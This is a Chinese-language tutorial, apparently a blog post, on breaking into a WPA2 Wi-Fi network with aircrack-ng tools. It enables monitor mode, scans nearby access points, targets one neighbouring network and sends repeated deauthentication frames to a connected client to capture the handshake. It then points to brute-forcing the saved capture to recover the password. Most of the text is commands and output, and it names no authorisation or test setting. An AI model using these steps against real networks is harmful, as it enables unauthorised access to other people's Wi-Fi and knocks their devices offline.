1:确认网卡名称 iwconfig

2:设置监听模式:airmon-ng start wlan0

注意!

这里如果出错:ERROR adding monitor mode interface: command failed: Operation not supported (-95)。

这是博通的一个问题,可以通过以下方式解决。

sudo rmmod brcmfmac

sudo modprobe brcmfmac

3:扫描附近 WIFI:airodump-ng wlan0mon,例如扫描到以下结果:

1
2
3
4
5
6
7
8
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

58:41:20:A9:B8:F6 -82 3 0 0 1 540 WPA2 CCMP PSK TP-LINK_B8F6ZM
E2:95:49:AE:9D:CB -83 3 0 0 1 400 WPA2 CCMP PSK HUAWEI-1A1HZ3
74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888
24:06:F2:15:BB:11 -67 5 0 0 10 130 WPA2 CCMP PSK CU_PsRx
BC:54:FC:29:3E:0A -85 2 0 0 13 270 WPA2 CCMP PSK MERCURY_6413
B0:45:02:86:79:7C -81 4 0 0 6 360 WPA2 CCMP PSK HUAWEI-0E1H2P

以下例子以 74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888 为例。

4:监听某个 WIFI 的流量:airodump-ng -w tplink -c 6 --bssid 74:45:2D:21:17:E8 wlan0mon,其中 -w 就用固定值即可,伪装一下, -c 是信道,--bssid 就是我们要渗透的无线热点的MAC。

我们得到以下客户端:

1
2
3
4
5
6
7
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -74 48 186 11 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -1 1e- 0 0 1

不要关闭这个窗口!

5:一定要新开一个窗口! 来攻击这个无线的客户端来抓取握手包,这个过程中客户端会不停的尝试连接 WIFI,网络状态是无法上网的,所以可以认为是一种另类的攻击方式,当然我们不想要攻击客户端,我们要的是渗透。
这里的 -0 代表攻击次数,可以多一点。-a 代表 WIFI 的 MAC,-c 就是这个 WIFI 下面客户端的 MAC。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ sudo aireplay-ng -0 100 -a 74:45:2D:21:17:E8 -c E0:BA:AD:27:9A:00 wlan0mon
05:35:34 Waiting for beacon frame (BSSID: 74:45:2D:21:17:E8) on channel 6
05:35:34 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:37 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:42 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]

6:回到之前的窗口,这时候我们可以看到 WIFI 状态中客户端有很多 Lost

1
2
3
4
5
6
7
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -40 51 438 97 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -82 1e- 1 1030 29437

如果出现 WPA handshake: E0:BA:AD:27:9A:00 字样就代表握手包已经抓取到了,也会根据提示保存在 xxx.cap 文件中。

7:啊,接下去就是爆破这个 xxx.cap 文件的过程了,太黑了,就不说了,爆破完了就能获取到这个 WIFI 的连接密码。